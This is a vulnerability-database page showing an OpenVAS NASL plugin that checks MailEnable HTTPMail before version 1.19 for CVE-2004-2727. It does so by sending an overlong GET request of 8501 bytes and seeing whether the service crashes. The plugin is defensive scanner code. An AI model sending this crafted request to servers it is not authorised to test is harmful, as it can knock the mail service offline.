Lucene search
+L

MailEnable < 1.19 HTTPMail Service GET Overflow Vulnerability - Active Check

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2004 George A. TheallType 
openvas
 openvas
🔗 plugins.openvas.org👁 38 Views

MailEnable < 1.19 HTTPMail Service GET Overflow Vulnerability - Active Check. MailEnable is prone to a heap buffer overflow vulnerability. The flaw can be exploited by issuing an HTTP request exceeding 4045 bytes (8500 if logging is disabled), which causes a heap buffer overflow, crashing the HTTPMail service and possibly allowing for arbitrary code execution. Update to version 1.19 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE-2004-2727
9 Oct 200710:00
cve
cvelist
CVE-2004-2727
9 Oct 200710:00
cvelist
euvd
EUVD-2004-2717
7 Oct 202500:30
euvd
nessus
MailEnable Professional HTTPMail GET Request Remote Overflow
3 Sep 200400:00
nessus
nvd
CVE-2004-2727
31 Dec 200405:00
nvd
openvas
MailEnable HTTPMail Service GET Overflow Vulnerability
3 Nov 200500:00
openvas
SourceLink
securityfocuswww.securityfocus.com/bid/10312
# SPDX-FileCopyrightText: 2005 George A. Theall
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:mailenable:mailenable";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.14656");
  script_version("2025-01-31T15:39:24+0000");
  script_tag(name:"last_modification", value:"2025-01-31 15:39:24 +0000 (Fri, 31 Jan 2025)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:N/A:P");

  script_cve_id("CVE-2004-2727");
  script_xref(name:"OSVDB", value:"6037");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("MailEnable < 1.19 HTTPMail Service GET Overflow Vulnerability - Active Check");

  script_category(ACT_DENIAL);

  script_copyright("Copyright (C) 2004 George A. Theall");
  script_family("Denial of Service");
  script_dependencies("gb_mailenable_consolidation.nasl");
  script_mandatory_keys("mailenable/http/detected");
  script_require_ports("Services/www", 443);

  script_tag(name:"summary", value:"MailEnable is prone to a heap buffer overflow vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks if the service is
  still responding.");

  script_tag(name:"impact", value:"The flaw can be exploited by issuing an HTTP request exceeding
  4045 bytes (8500 if logging is disabled), which causes a heap buffer overflow, crashing the
  HTTPMail service and possibly allowing for arbitrary code execution.");

  script_tag(name:"solution", value:"Update to version 1.19 or later.");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/10312");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

# nb: Should be always before the first http_open_socket() call.
host = http_host_name(port: port);

if (!soc = http_open_socket(port))
  exit(0);

req = string(
  # assume logging is disabled.
  "GET /", crap(length: 8501, data: "X"), " HTTP/1.0\r\n",
  "Host: ", host, "\r\n",
  "\r\n" );

send(socket: soc, data: req);
res = http_recv(socket: soc);
http_close_socket(soc);

if (!res) {
  soc = http_open_socket(port);
  if (!soc) {
    security_message(port: port);
    exit(0);
  } else {
    http_close_socket(soc);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jan 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 24.3
EPSS0.03571
38